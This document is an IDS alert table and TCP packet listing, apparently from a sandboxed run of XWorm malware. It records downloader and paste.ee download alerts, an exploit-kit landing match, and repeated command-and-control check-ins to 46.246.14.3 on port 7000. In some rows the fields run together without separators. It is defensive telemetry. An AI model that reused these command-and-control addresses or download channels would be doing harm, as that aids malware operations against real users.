Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-03T06:53:10.743341+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49708 | 104.20.4.235 | 443 | TCP
2024-10-03T06:53:13.592811+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49710 | 104.20.4.235 | 443 | TCP
2024-10-03T06:53:14.450466+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | TCP
2024-10-03T06:53:14.599789+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 188.114.96.3 | 443 | 192.168.2.5 | 49711 | TCP
2024-10-03T06:53:26.855375+0200 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:53:27.229468+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:53:27.281241+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:53:31.500323+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49725 | 104.20.4.235 | 443 | TCP
2024-10-03T06:53:32.934662+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:53:32.934662+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:53:34.227323+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49727 | 104.20.4.235 | 443 | TCP
2024-10-03T06:53:35.100353+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.5 | 49728 | 188.114.96.3 | 443 | TCP
2024-10-03T06:53:35.248038+0200 | 2020424 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 | 1 | 188.114.96.3 | 443 | 192.168.2.5 | 49728 | TCP
2024-10-03T06:53:38.696524+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:53:38.698900+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:53:50.480098+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:53:50.520812+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:01.564440+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:01.589317+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:02.852872+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:02.852872+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:13.168649+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:13.171376+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:18.695335+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:18.699279+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:30.008241+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:30.011608+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:31.785152+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:31.787240+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:32.851069+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:32.851069+0200 | 2852874 | ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:34.704124+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:34.705701+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:34.979628+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:34.982207+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:42.056654+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:42.058423+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
2024-10-03T06:54:50.292339+0200 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 46.246.14.3 | 7000 | 192.168.2.5 | 49712 | TCP
2024-10-03T06:54:50.295484+0200 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.5 | 49712 | 46.246.14.3 | 7000 | TCP
                                                            2024-10-03T06:54:57.753720+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:54:57.765253+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:00.347039+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:00.348865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.063226+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.065080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.393882+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.395979+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:01.708783+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:01.710572+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:02.020012+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:02.042058+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:02.862710+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:02.862710+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:06.543005+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:06.545750+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
                                                            2024-10-03T06:55:15.805767+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes146.246.14.37000192.168.2.549712TCP
                                                            2024-10-03T06:55:15.806620+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.54971246.246.14.37000TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Oct 3, 2024 06:53:28.367235899 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.382477045 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.423444033 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.514761925 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.514966965 CEST44349722104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:28.515036106 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.515737057 CEST49722443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:28.518873930 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.518929958 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:28.519053936 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.519288063 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:28.519316912 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.249829054 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.250272036 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.251722097 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.251777887 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.252155066 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.253621101 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.295475960 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731653929 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731719971 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731765032 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.731833935 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731873035 CEST44349723185.166.143.50192.168.2.5
                                                            Oct 3, 2024 06:53:29.731875896 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.734654903 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:29.839771032 CEST49723443192.168.2.5185.166.143.50
                                                            Oct 3, 2024 06:53:30.043791056 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.043879986 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.043968916 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.049074888 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.049113989 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.620732069 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.620929003 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.626286983 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.626343966 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.626699924 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.629554987 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.675445080 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765286922 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765436888 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765687943 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.765752077 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.765837908 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.772739887 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772759914 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772890091 CEST443497243.5.25.83192.168.2.5
                                                            Oct 3, 2024 06:53:30.772990942 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.772990942 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.773885965 CEST49724443192.168.2.53.5.25.83
                                                            Oct 3, 2024 06:53:30.910020113 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910463095 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910521030 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.910645962 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910870075 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:30.910885096 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.915642977 CEST8049721104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:30.915874958 CEST4972180192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.372246981 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.374102116 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.374109030 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500391006 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500734091 CEST44349725104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:31.500926971 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:31.501256943 CEST49725443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:32.934662104 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:32.976911068 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:33.631196022 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631269932 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:33.631350040 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631619930 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:33.631644011 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.100311041 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.101584911 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.101653099 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.227324963 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.227601051 CEST44349727104.20.4.235192.168.2.5
                                                            Oct 3, 2024 06:53:34.228935957 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.229077101 CEST49727443192.168.2.5104.20.4.235
                                                            Oct 3, 2024 06:53:34.230345964 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230386972 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.230465889 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230688095 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.230704069 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.692018032 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.692089081 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.693492889 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.693501949 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.693979979 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:34.697334051 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:34.739401102 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100415945 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100547075 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100601912 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.100625992 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100702047 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.100750923 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.100758076 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160026073 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160089016 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160108089 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160198927 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160244942 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160252094 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160626888 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.160676003 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.160681963 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186079025 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186137915 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186152935 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186249971 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186294079 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186302900 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186445951 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186499119 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186505079 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186611891 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186655045 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.186661959 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.186975002 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.187026978 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.187043905 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246350050 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246403933 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246423006 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246517897 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246562004 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246568918 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246666908 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246716976 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246725082 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246814013 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.246860027 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.246866941 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247302055 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247345924 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.247351885 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247793913 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247848988 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.247854948 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.247965097 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248011112 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.248017073 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248133898 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.248183966 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.248191118 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272303104 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272392988 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272479057 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272491932 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.272500992 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272562981 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.272569895 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.272618055 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.273195028 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.273274899 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.273993015 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.274059057 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.274099112 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.274162054 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332628965 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332698107 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332731009 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332784891 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332834959 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332886934 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.332936049 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.332984924 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333023071 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333077908 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333669901 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333724022 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.333802938 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.333857059 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.334609985 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334664106 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.334688902 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334913969 CEST44349728188.114.96.3192.168.2.5
                                                            Oct 3, 2024 06:53:35.334964991 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:35.335211039 CEST49728443192.168.2.5188.114.96.3
                                                            Oct 3, 2024 06:53:38.289660931 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:38.294894934 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:38.696523905 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:38.698899984 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:38.704027891 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:49.727406979 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:49.961220026 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:50.102921009 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.102943897 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.480098009 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:53:50.520812035 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:53:50.525895119 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.165043116 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:01.176703930 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.564440012 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:01.589317083 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:01.609400034 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:02.852871895 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:02.992396116 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:12.602287054 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:12.607464075 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:13.168648958 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:13.171375990 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:13.176336050 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.196289062 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:18.201544046 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.695334911 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:18.699279070 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:18.704433918 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:29.633410931 CEST497127000192.168.2.546.246.14.3
                                                            Oct 3, 2024 06:54:29.638673067 CEST70004971246.246.14.3192.168.2.5
                                                            Oct 3, 2024 06:54:30.008240938 CEST70004971246.246.14.3192.168.2.5
